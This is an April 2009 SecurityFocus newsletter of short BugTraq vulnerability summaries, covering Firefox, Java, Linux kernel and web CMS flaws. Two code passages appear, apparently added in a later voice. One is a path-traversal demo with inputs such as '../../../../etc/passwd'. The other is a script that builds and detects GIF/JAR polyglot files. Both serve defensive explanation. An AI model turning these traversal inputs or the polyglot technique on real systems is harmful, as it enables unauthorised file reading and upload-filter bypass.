SecurityFocus News
SecurityFocus Newsletter #498 Apr 09 2009 10:39PM
sfa securityfocus com
SecurityFocus Newsletter #498
----------------------------------------

This issue is sponsored by Red Hat

Putting open source to the test: The making of JBoss Enterprise Middleware

Through a rigorous productization process, JBoss Enterprise Middleware teams continually harden and transform cutting-edge open source technology into well-tempered enterprise software products with unsurpassed quality, performance, and stability - then deliver it with top-notch support and mission-critical SLAs. Here's how it's done.

http://dinclinx.com/Redirect.aspx?36;4756;20;189;0;1;259;ac28cb88c17443b5

SECURITY BLOGS
SecurityFocus has selected a few syndicated sources that stand out as conveying topics of interest for our community. We are proud to offer content from Matasano at this time and will be adding more in the coming weeks.
http://www.securityfocus.com/blogs

------------------------------------------------------------------
I. FRONT AND CENTER
1. Facebook, Privacy and Contracts
2. Act Locally, Pwn Globally
II. BUGTRAQ SUMMARY
1. Geeklog 'SEC_authenticate()' SQL Injection Vulnerability
2. glFusion 'SESS_updateSessionTime()' SQL Injection Vulnerability
3. Mozilla Firefox/SeaMonkey UTF-8 Stack-Based Buffer Overflow Vulnerability
4. Mozilla Firefox/Thunderbird/SeaMonkey Arbitrary Image Cross Domain Security Bypass Vulnerability
5. Mozilla Firefox URI Splitting Security Bypass Vulnerability
6. Mozilla Firefox/Thunderbird/SeaMonkey Multiple Remote Vulnerabilities
7. Mozilla Firefox CSSValue Array Data Structure Remote Code Execution Vulnerability
8. Mozilla Firefox '.url' Shortcut Processing Information Disclosure Vulnerability
9. Mozilla Firefox Mac OS X GIF Rendering Memory Corruption Vulnerability
10. Sun Java System Access Manager Username Enumeration Weakness
11. Sun Java System Identity Manager Multiple Vulnerabilities
12. Sun Solaris 'xscreensaver(1)' Information Disclosure Vulnerability
13. Photo-Graffix 'wmprocess.php' Local File Include Vulnerability
14. Photo-Graffix 'mp3upload.htm' Arbitrary File Upload Vulnerability
15. ClamAV Multiple Remote Denial of Service Vulnerabilities
16. Little CMS Memory Leak and Multiple Memory Corruption Vulnerabilities
17. Sun Java Applet Font.createFont Remote Denial Of Service Vulnerability
18. Sun Java Web Start and Java Plug-in JAR File Privilege Escalation Vulnerability
19. Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities
20. Sun Java Web Start and Java Plug-in Multiple Privilege Escalation Vulnerabilities
21. pam-krb5 Local Privilege Escalation Vulnerability
22. pam-krb5 'KRB5CCNAME' Environment Variable Local Privilege Escalation Vulnerability
23. CF Shopkart 'index.cfm' SQL Injection Vulnerability
24. Q2 Solutions ConnX 'frmLoginPwdReminderPopup.aspx' SQL Injection Vulnerability
25. Pixie CMS SQL Injection and Cross Site Scripting Vulnerabilities
26. PPLive URI Handlers 'LoadModule' Parameter Multiple Remote Code Execution Vulnerabilities
27. NetworkManager Permission Enforcement Multiple Local Vulnerabilities
28. Wireshark Prior to 1.0.7 Multiple Denial Of Service Vulnerabilities
29. XBMC Multiple Remote Buffer Overflow Vulnerabilities
30. Wireshark PN-DCP Data Format String Vulnerability
31. multipath-tools 'multipathd' Local Denial of Service Vulnerability
32. net2ftp Multiple Cross-Site Scripting Vulnerabilities
33. Tor Unspecified Remote Memory Corruption Vulnerability
34. Tor Multiple Denial of Service Vulnerabilities
35. Tor Security Bypass And Privilege Escalation Weaknesses
36. Ots Labs OtsTurntables OFL File Buffer Overflow Vulnerability
37. AdaptBB Multiple Input Validation Vulnerabilities
38. Linux Kernel CIFS Remote Buffer Overflow Vulnerability
39. Maian Music Joomla! Component 'category' Parameter SQL Injection Vulnerability
40. Cisco Subscriber Edge Services Manager Cross Site Scripting And HTML Injection Vulnerabilities
41. Linksys WRT160N Wireless Router Cross-Site Request Forgery Vulnerability
42. HP ProCurve Manager and ProCurve Manager Plus Unauthorized Access Vulnerability
43. Cisco Unified Communications Manager SIP Service Multiple Denial of Service Vulnerabilities
44. Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities
45. Microsoft April 2009 Advance Notification Multiple Vulnerabilities
46. ClamAV Prior to 0.95.1 Multiple Remote Denial of Service Vulnerabilities
47. Ghostscript 'jbig2dec' JBIG2 Processing Buffer Overflow Vulnerability
48. IBM Lotus Domino IMAP Server Remote Denial of Service Vulnerability
49. MIT Kerberos 'NegTokenInit' Token Handling Remote Denial Of Service Vulnerability
50. IBM Tivoli Storage Manager Multiple Vulnerabilities
51. MIT Kerberos SPNEGO and ASN.1 Multiple Remote Denial Of Service Vulnerabilities
52. MIT Kerberos 'asn1_decode_generaltime()' Uninitialized Pointer Memory Corruption Vulnerability
53. InnerMedia DynaZip ZIP Archive Handling Multiple Buffer Overflow Vulnerabilities
54. OpenSSL Multiple Vulnerabilities
55. ejabberd MUC Logs Cross Site Scripting Vulnerability
56. Avahi 'avahi-core/server.c' Multicast DNS Denial Of Service Vulnerability
57. FFmpeg 'libavformat/4xm.c' Remote Code Execution Vulnerability
58. PHP 'imageRotate()' Uninitialized Memory Information Disclosure Vulnerability
59. Net-SNMP 'snmpUDPDomain.c' Remote Information Disclosure Vulnerability
60. Gretech GOM Player '.srt' File Remote Buffer Overflow Vulnerability
61. Joomla! 'com_mailto' Component 'article' Parameter SQL Injection Vulnerability
62. Joomla! cmimarketplace Component 'viewit' Parameter Directory Traversal Vulnerability
63. Horde Products Local File Include and Cross Site Scripting Vulnerabilities
64. Horde Turba 'services/obrowser/index.php' HTML Injection Vulnerability
65. Horde XSS Filter Cross Site Scripting Vulnerability
66. Linux Kernel 'exit_notify()' CAP_KILL Verification Local Privilege Escalation Vulnerability
67. Bugzilla 'attachment.cgi' Cross Site Request Forgery Vulnerability
68. LinPHA 1.3.4 Multiple Cross-Site Scripting Vulnerabilities
69. Xplode 'module_wrapper.asp' SQL Injection and Cross Site Scripting Vulnerabilities
70. Linux Kernel 'sock.c' SO_BSDCOMPAT Option Information Disclosure Vulnerability
71. Linux Kernel 'FWD-TSN' Chunk Remote Buffer Overflow Vulnerability
72. Linux Kernel 'seccomp' System Call Security Bypass Vulnerability
73. Linux Kernel '/ipc/shm.c' Local Denial of Service Vulnerability
74. Linux Kernel 'dell_rbu' Local Denial of Service Vulnerabilities
75. Linux Kernel Audit System 'audit_syscall_entry()' System Call Security Bypass Vulnerability
76. Linux Kernel Cloned Process 'CLONE_PARENT' Local Origin Validation Weakness
77. XIGLA Absolute Form Processor XE 'login.asp' SQL Injection Vulnerability
78. WebFileExplorer 'body.asp' SQL Injection Vulnerability
79. SWF Opener Buffer Overflow Vulnerability
80. BackendCMS 'main.asp' SQL Injection Vulnerability
81. EMC RepliStor Multiple Remote Heap Based Buffer Overflow Vulnerabilities
82. IBM BladeCenter Advanced Management Module Multiple Remote Vulnerabilities
83. Linux Kernel SPARC 'mremap()' Multiple Denial Of Service Vulnerabilities
84. Linux Kernel 'locks_remove_flock()' Local Race Condition Vulnerability
85. Linux Kernel 64 Bit ABI System Call Parameter Privilege Escalation Vulnerability
86. Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
87. Tunapie Stream URI Remote Command Execution Vulnerability
88. Tunapie Insecure Temporary File Creation Vulnerability
89. Lanius CMS 'upload.php' Arbitrary File Upload Vulnerability
90. Cisco PIX and ASA Multiple Denial of Service, ACL Bypass, and Authentication Bypass Vulnerabilities
91. SASPCMS SQL Injection and Cross Site Scripting Vulnerabilities
92. OpenGoo Cross Site Scripting And HTML Injection Vulnerabilities
93. OpenAFS Unix Cache Manager Heap-Based Buffer Overflow Vulnerability
94. OpenAFS Error Codes Remote Denial of Service Vulnerability
95. RETIRED: vBulletin Admin Control Panel Multiple HTML Injection Vulnerabilities
96. Little CMS Monochrome Profiles Null Pointer Dereference Denial of Service Vulnerability
97. RETIRED: Little CMS Monochrome Profiles Null Pointer Dereference Denial of Service Vulnerability
98. OpenSSL PKCS Padding RSA Signature Forgery Vulnerability
99. Mozilla SeaMonkey/Thunderbird Newsgroup Cancel Message Handling Buffer Overflow Vulnerability
100. Mozilla Firefox 2.0.0.14 Multiple Remote Vulnerabilities
III. SECURITYFOCUS NEWS
1. Browsers bashed first in hacking contest
2. Experts: U.S. needs to defend its "cyber turf"
3. Advisor: U.S. needs policy to defend cyberspace
4. Cabal forms to fight Conficker, offers bounty
IV. SECURITY JOBS LIST SUMMARY
V. INCIDENTS LIST SUMMARY
VI. VULN-DEV RESEARCH LIST SUMMARY
VII. MICROSOFT FOCUS LIST SUMMARY
1. SecurityFocus Microsoft Newsletter #438
VIII. SUN FOCUS LIST SUMMARY
IX. LINUX FOCUS LIST SUMMARY
X. UNSUBSCRIBE INSTRUCTIONS
XI. SPONSOR INFORMATION

I. FRONT AND CENTER
---------------------
1. Facebook, Privacy and Contracts
On February 4, the social networking site Facebook made a minor change to its terms of service - the online contract that every user must agree to when they create an account.
Facebook was trying to solve a legitimate problem: People who deleted their accounts did not realize that information that they shared with other users would persist on their Facebook friends' accounts. Thus, they needed some way of telling users that the information might remain.
http://www.securityfocus.com/columnists/497

2. Act Locally, Pwn Globally
By Jeffrey Carr
On December 24, 2008, the Pakistani Whackerz Cr3w defaced a part of India's critical infrastructure, the Eastern Railway system Web site. The defacement appeared on a scroll feed which read: "Cyber war has been declared on Indian cyberspace by Whackerz- Pakistan (24 Dec-2008)."
http://www.securityfocus.com/columnists/496

II. BUGTRAQ SUMMARY
--------------------
1. Geeklog 'SEC_authenticate()' SQL Injection Vulnerability
BugTraq ID: 34456
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34456
Summary:
Geeklog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Geeklog 1.5.2 and earlier are vulnerable.

2. glFusion 'SESS_updateSessionTime()' SQL Injection Vulnerability
BugTraq ID: 34361
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34361
Summary:
glFusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

This issue affects glFusion 1.1.2 and earlier. Note that it also affects Geeklog 1.5.2 and earlier.

3. Mozilla Firefox/SeaMonkey UTF-8 Stack-Based Buffer Overflow Vulnerability
BugTraq ID: 31397
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/31397
Summary:
Mozilla Firefox and SeaMonkey are prone to a stack-based buffer-overflow vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Versions prior to Firefox 2.0.0.17 and prior to SeaMonkey 1.1.12 are vulnerable.

NOTE: This issue was originally documented in BID 31346 (Mozilla Firefox/SeaMonkey/Thunderbird Multiple Remote Vulnerabilities). It has been given its own record to better document the details.

4. Mozilla Firefox/Thunderbird/SeaMonkey Arbitrary Image Cross Domain Security Bypass Vulnerability
BugTraq ID: 32351
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/32351
Summary:
Mozilla Firefox, Thunderbird, and SeaMonkey are prone to a cross-domain security-bypass vulnerability that can allow an attacker to bypass the same-origin policy.

The attacker can exploit this issue to access arbitrary images from other domains.

Versions prior to Firefox 2.0.0.18 are vulnerable.

NOTE: This issue was previously included in BID 32281 'Mozilla Firefox/Thunderbird/SeaMonkey Multiple Remote Vulnerabilities', but has been given its own record to better document the issue.

5. Mozilla Firefox URI Splitting Security Bypass Vulnerability
BugTraq ID: 30242
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/30242
Summary:
Mozilla Firefox is prone to a security-bypass vulnerability because of a design error.

Exploiting this issue could allow an attacker to bypass certain security restrictions and launch restricted URIs. Specifically, the attacker could use external applications to launch 'chrome:' URIs or to pass certain URIs to Firefox that would normally be handled by a vector application.

The issue affects Firefox 3.0 and versions prior to 2.0.0.16.

6. Mozilla Firefox/Thunderbird/SeaMonkey Multiple Remote Vulnerabilities
BugTraq ID: 32281
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/32281
Summary:
The Mozilla Foundation has released multiple security advisories specifying various vulnerabilities in Mozilla Firefox, Thunderbird, and SeaMonkey.

Exploiting these issues can allow attackers to:

- steal authentication credentials
- obtain potentially sensitive information
- violate the same-origin policy
- execute scripts with elevated privileges
- cause denial-of-service conditions
- execute arbitrary code

Other attacks are also possible.

These issues are present in the following applications:

Firefox 3.0.3 and prior
Firefox 2.0.0.17 and prior
Thunderbird: 2.0.0.17 and prior
SeaMonkey 1.1.12 and prior

7. Mozilla Firefox CSSValue Array Data Structure Remote Code Execution Vulnerability
BugTraq ID: 29802
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/29802
Summary:
Mozilla Firefox is prone to a remote code-execution vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application.

The issue affects Firefox 3.0 and versions prior to Firefox 2.0.0.16. Versions prior to Thunderbird 2.0.0.16 and prior to SeaMonkey 1.1.11 are also affected.

NOTE: Mozilla Thunderbird is affected by this issue only if JavaScript has been enabled in the application. This setting is disabled by default.

8. Mozilla Firefox '.url' Shortcut Processing Information Disclosure Vulnerability
BugTraq ID: 31747
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/31747
Summary:
Mozilla Firefox is prone to an information-disclosure vulnerability when processing '.url' shortcut files in HTML elements.

An attacker can exploit the issue to obtain sensitive information such as browser cache files, cookie data, or local filesystem details. Information harvested may aid in further attacks.

NOTE: To exploit this issue, the attacker must trick a victim into saving a malicious HTML file to the local system and then following a malicious URI.

Mozilla Firefox 3.0.1, 3.0.2, and 3.0.3 are reported vulnerable.

9. Mozilla Firefox Mac OS X GIF Rendering Memory Corruption Vulnerability
BugTraq ID: 30266
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/30266
Summary:
Mozilla Firefox for Mac OS X is prone to a memory-corruption vulnerability.

An attacker may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely crash the application.

This issue affects Firefox 3.0.

10. Sun Java System Access Manager Username Enumeration Weakness
BugTraq ID: 33489
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/33489
Summary:
Sun Java System Access Manager is prone to a username-enumeration weakness because of a design error in the application when verifying user-supplied input.

Attackers may exploit this weakness to discern valid usernames. This may aid them in brute-force password cracking or other attacks.

This issue affects the following versions:

Sun Java System Access Manager 6 2005Q1 (6.3)
Sun Java System Access Manager 7 2005Q4 (7.0)
Sun Java System Access Manager 7.1

Sun OpenSSO is also reported vulnerable.

11. Sun Java System Identity Manager Multiple Vulnerabilities
BugTraq ID: 34191
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34191
Summary:
Sun Java System Identity Manager is prone to multiple vulnerabilities, including information-disclosure issues, cross-site scripting issues, privilege-escalation issues, and a remote code-execution vulnerability.

Successful exploits may allow an attacker to obtain sensitive information, execute arbitrary script code in the browser of an unsuspecting user in the context of a site, perform unauthorized actions, or gain unauthorized access to the affected application. This may aid in the complete compromise of the computer. Other attacks are also possible.

These issues affect the following versions:

Sun Java System Identity Manager 7.0
Sun Java System Identity Manager 7.1
Sun Java System Identity Manager 7.1.1
Sun Java System Identity Manager 8.0

12. Sun Solaris 'xscreensaver(1)' Information Disclosure Vulnerability
BugTraq ID: 34421
Remote: No
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34421
Summary:
Sun Solaris 'xscreensaver(1)' is prone to an information-disclosure vulnerability.

An attacker with local physical access to the console can exploit this issue to gain unauthorized access to certain information.

This issue affects Solaris 8, 9, 10, and OpenSolaris.

13. Photo-Graffix 'wmprocess.php' Local File Include Vulnerability
BugTraq ID: 34436
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34436
Summary:
Photo-Graffix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view and execute arbitrary local files in the context of the webserver process. This may aid in further attacks.

Photo-Graffix 3.4 is vulnerable; other versions may also be affected.
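The local file-include entry above describes the usual shape of this bug class: a request parameter is joined onto a template directory and handed to an include, so '../' sequences, absolute paths, or a NUL byte let the caller pick any file the web server can read. The example below is added here and is not Photo-Graffix code or its parameter names; it uses Python on a throwaway directory with a made-up 'home.tpl' template to contrast the naive join with a resolution that confines the result to the base directory and an expected suffix.

```python
import os
import tempfile

# Hypothetical template layout, created by demo(); nothing here reproduces
# the real application's file or parameter names.

def include_path_naive(base_dir, page):
    """What a vulnerable include does: join the request parameter onto the base
    directory. '../' sequences and absolute paths both leave base_dir."""
    return os.path.normpath(os.path.join(base_dir, page))

def resolve_include(base_dir, page, allowed_suffix=".tpl"):
    """Resolve the requested page and accept it only if it stays inside base_dir
    and ends with the expected suffix. Returns the real path or None."""
    if "\x00" in page:            # NUL truncation trick: 'home.tpl\x00.jpg'
        return None
    base = os.path.realpath(base_dir)
    try:
        # realpath follows symlinks, so a link planted inside base_dir that
        # points outside it is also caught by the containment check below.
        target = os.path.realpath(os.path.join(base, page))
        inside = os.path.commonpath([base, target]) == base
    except ValueError:            # e.g. paths on different drives on Windows
        return None
    if not inside or not target.endswith(allowed_suffix):
        return None
    return target

def demo():
    """Try representative requests against both versions in a temporary directory.
    Returns {request: (naive path stays inside base, hardened version accepts)}."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        base = os.path.realpath(d)
        with open(os.path.join(base, "home.tpl"), "w") as f:
            f.write("welcome")    # constructed template content
        for req in ["home.tpl", "../../../../etc/passwd", "/etc/passwd",
                    "home.tpl\x00.jpg", "home.php"]:
            naive = include_path_naive(base, req)
            results[req] = (os.path.commonpath([base, naive]) == base,
                            resolve_include(base, req) is not None)
    return results

if __name__ == "__main__":
    for req, (naive_ok, hardened_ok) in demo().items():
        print("%-26r naive stays inside: %-5s hardened accepts: %s"
              % (req, naive_ok, hardened_ok))
```

The suffix check matters as much as the containment check: an include that stays inside the template directory but can be pointed at an uploaded file still executes attacker-controlled content, which is why the arbitrary-upload entry that follows is dangerous in combination with this one.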

14. Photo-Graffix 'mp3upload.htm' Arbitrary File Upload Vulnerability
BugTraq ID: 34434
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34434
Summary:
Photo-Graffix is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Photo-Graffix 3.4 is vulnerable; other versions may also be affected.

15. ClamAV Multiple Remote Denial of Service Vulnerabilities
BugTraq ID: 34357
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/34357
Summary:
ClamAV is prone to multiple denial-of-service vulnerabilities when handling malformed files.

Successfully exploiting these issues allows remote attackers to deny service to legitimate users.

Versions prior to ClamAV 0.95 are vulnerable.

16. Little CMS Memory Leak and Multiple Memory Corruption Vulnerabilities
BugTraq ID: 34185
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/34185
Summary:
Little CMS is prone to a denial-of-service vulnerability and multiple memory-corruption vulnerabilities because it fails to perform adequate checks on user-supplied input.

Attackers may leverage these issues to execute arbitrary code in the context of the application or launch denial-of-service attacks.

Versions prior to Little CMS 1.18beta2 are vulnerable.

NOTE: Other applications that use Little CMS (such as Mozilla Firefox, OpenJDK, and GIMP) are vulnerable to these issues as well.

17. Sun Java Applet Font.createFont Remote Denial Of Service Vulnerability
BugTraq ID: 17981
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/17981
Summary:
Sun Java is prone to a remote denial-of-service vulnerability because the application fails to properly handle certain Java applets.

Successfully exploiting this issue will cause the application to create a temporary file that will grow in an unbounded fashion, consuming all available disk space. This will likely result in a denial-of-service condition.

Sun Java JDK 1.4.2_11 and 1.5.0_06 are vulnerable; other versions may also be affected.

18. Sun Java Web Start and Java Plug-in JAR File Privilege Escalation Vulnerability
BugTraq ID: 32892
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/32892
Summary:
Sun Java Web Start and Java Plug-in are prone to a privilege-escalation vulnerability.

This issue occurs when the affected applications parse a JAR file that is also a legitimate GIF image file.

An attacker may exploit this issue to obtain sensitive information (such as HTTP session cookies) or to perform actions as legitimate users of a web application. This may aid in further attacks.

NOTE: This issue was previously covered in BID 32620 (Sun Java Web Start and Java Plug-in Multiple Privilege Escalation Vulnerabilities), but has been given its own record to better document the issue.

The following versions are affected:

JDK and JRE 6 Update 10 and earlier
JDK and JRE 5.0 Update 16 and earlier
SDK and JRE 1.4.2_18 and earlier
SDK and JRE 1.3.1_23 and earlier
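The entry above turns on a property of the two file formats rather than a parsing bug: a GIF decoder reads from the start of the file and stops at the trailer, while a ZIP (and therefore JAR) reader locates the end-of-central-directory record from the end of the file and rebases the member offsets, so one byte string can satisfy both. The example below is added here and is not Sun's or SecurityFocus's code; it builds such a polyglot from a constructed 1x1 GIF and placeholder archive members, then shows the check an upload handler can apply so that user-supplied "images" that also open as archives are rejected.

```python
import io
import zipfile

# Constructed 1x1-pixel GIF89a (35 bytes): header, screen descriptor, two-colour
# table, image descriptor, LZW pixel data, trailer. Any real image would do.
TINY_GIF = (
    b"GIF89a"
    b"\x01\x00\x01\x00\x80\x00\x00"
    b"\x00\x00\x00\xff\xff\xff"
    b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"
    b"\x02\x02\x44\x01\x00"
    b"\x3b"
)

# Leading bytes an upload filter typically sniffs for; none of them is ZIP's "PK".
IMAGE_MAGICS = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
}

def build_jar(entries):
    """Return a ZIP (JAR) archive holding the given {name: bytes} members."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

def build_polyglot(image, archive):
    """Image first, archive appended. The image decoder stops at the GIF trailer;
    the ZIP reader finds the end-of-central-directory record at the tail and
    corrects the member offsets by the length of the leading data."""
    return image + archive

def image_type(data):
    """Image format implied by the leading magic, or None."""
    for magic, kind in IMAGE_MAGICS.items():
        if data.startswith(magic):
            return kind
    return None

def archive_members(data):
    """Member names if the bytes are readable as a ZIP archive, else None."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return None
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()

def is_image_archive_polyglot(data):
    """The upload-time check: an image header on a file that also opens as an archive."""
    return image_type(data) is not None and archive_members(data) is not None

if __name__ == "__main__":
    # Placeholder members; the class bytes are only the 'cafebabe' magic, not a real class.
    jar = build_jar({"META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n",
                     "Applet.class": b"\xca\xfe\xba\xbe"})
    poly = build_polyglot(TINY_GIF, jar)
    print(image_type(poly), archive_members(poly), is_image_archive_polyglot(poly))
```

A filter that inspects only the first few bytes accepts the polyglot as a GIF, which is the whole point of the technique; scanning the tail for the end-of-central-directory record, as zipfile.is_zipfile does, is what catches it. Rejecting or re-encoding uploads that parse as archives is defence in depth on the server; the vendor update listed above remains the fix on the client.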

19. Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities
BugTraq ID: 32608
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/32608
Summary:
Sun Java Runtime Environment and Java Development Kit are prone to multiple security vulnerabilities.

Successful exploits may allow attackers to violate the same-origin policy, obtain sensitive information, bypass security restrictions, run untrusted applets with elevated privileges, and cause denial-of-service conditions. This may result in a compromise of affected computers.

These issues affect versions *prior to* the following:

JDK and JRE 6 Update 11
JDK and JRE 5.0 Update 17
SDK and JRE 1.4.2_19
SDK and JRE 1.3.1_24

20. Sun Java Web Start and Java Plug-in Multiple Privilege Escalation Vulnerabilities
BugTraq ID: 32620
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/32620
Summary:
Sun Java Web Start and Java Plug-in are prone to multiple privilege-escalation vulnerabilities.

Successful exploits may allow attackers to violate the same-origin policy, obtain sensitive information, bypass security, or read, write, and execute arbitrary files in the context of the user running a vulnerable application. This may result in a compromise of the underlying system.

The following versions are affected:

JDK and JRE 6 Update 10 and earlier
JDK and JRE 5.0 Update 16 and earlier
SDK and JRE 1.4.2_18 and earlier
SDK and JRE 1.3.1_23 and earlier

21. pam-krb5 Local Privilege Escalation Vulnerability
BugTraq ID: 33740
Remote: No
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/33740
Summary:
The 'pam-krb5' library is prone to a local privilege-escalation vulnerability because it fails to properly handle setuid processes.

Local attackers may exploit this issue to gain elevated privileges, which may lead to a complete compromise of the system.

This issue affects pam-krb5 as shipped with Debian, Ubuntu, and Gentoo Linux releases; other versions may also be vulnerable.

22. pam-krb5 'KRB5CCNAME' Environment Variable Local Privilege Escalation Vulnerability
BugTraq ID: 33741
Remote: No
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/33741
Summary:
The 'pam-krb5' library is prone to a local privilege-escalation vulnerability because it fails to properly handle setuid processes.

A local attacker may exploit this to corrupt the credential cache. This may allow the attacker to gain elevated privileges or to create a denial-of-service condition.

Versions prior to pam-krb5 3.13 are vulnerable.

23. CF Shopkart 'index.cfm' SQL Injection Vulnerability
BugTraq ID: 32765
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/32765
Summary:
CF Shopkart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

CF Shopkart 5.2.2 is vulnerable; other versions may also be affected.

24. Q2 Solutions ConnX 'frmLoginPwdReminderPopup.aspx' SQL Injection Vulnerability
BugTraq ID: 34350
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/34350
Summary:
Q2 Solutions ConnX is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ConnX 4.0.20080606 is vulnerable; other versions may also be affected.

25. Pixie CMS SQL Injection and Cross Site Scripting Vulnerabilities
BugTraq ID: 34189
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/34189
Summary:
Pixie CMS is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

26. PPLive URI Handlers 'LoadModule' Parameter Multiple Remote Code Execution Vulnerabilities
BugTraq ID: 34128
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/34128
Summary:
PPLive is prone to multiple remote code-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues can allow an attacker to execute arbitrary code within the context of the affected application.

PPLive 1.9.21 is vulnerable; other versions may also be affected.

27. NetworkManager Permission Enforcement Multiple Local Vulnerabilities
BugTraq ID: 33966
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33966
Summary:
NetworkManager is prone to multiple local vulnerabilities because the software fails to properly enforce permissions.

Local attackers can exploit these issues to issue D-Bus queries that reveal network connection passwords and pre-shared keys, and to modify or delete network connections. Other attacks may also be possible.

28. Wireshark Prior to 1.0.7 Multiple Denial Of Service Vulnerabilities
BugTraq ID: 34457
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34457
Summary:
Wireshark is prone to multiple denial-of-service vulnerabilities.

Exploiting these issues may allow attackers to crash the application, denying service to legitimate users. Attackers may be able to leverage some of these vulnerabilities to execute arbitrary code, but this has not been confirmed.

Versions prior to Wireshark 1.0.7 are vulnerable.

29. XBMC Multiple Remote Buffer Overflow Vulnerabilities
BugTraq ID: 34334
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34334
Summary:
XBMC is prone to multiple buffer-overflow vulnerabilities that occur because the application fails to perform adequate boundary checks on user-supplied data.

Attackers can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

XBMC 8.10 Atlantis is vulnerable; other versions may also be affected.

30. Wireshark PN-DCP Data Format String Vulnerability
BugTraq ID: 34291
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34291
Summary:
Wireshark is prone to a format-string vulnerability.

Attackers can leverage this issue to execute arbitrary code within the context of the vulnerable application. Failed attacks will likely cause denial-of-service conditions.

Wireshark 1.0.6 is vulnerable; other versions may also be affected.

31. multipath-tools 'multipathd' Local Denial of Service Vulnerability
BugTraq ID: 34410
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34410
Summary:
The 'multipath-tools' module is prone to a local denial-of-service vulnerability. A local attacker can exploit this issue to disrupt access to storage devices and corrupt filesystem data.

32. net2ftp Multiple Cross-Site Scripting Vulnerabilities
BugTraq ID: 34440
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34440
Summary:
The 'net2ftp' program is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

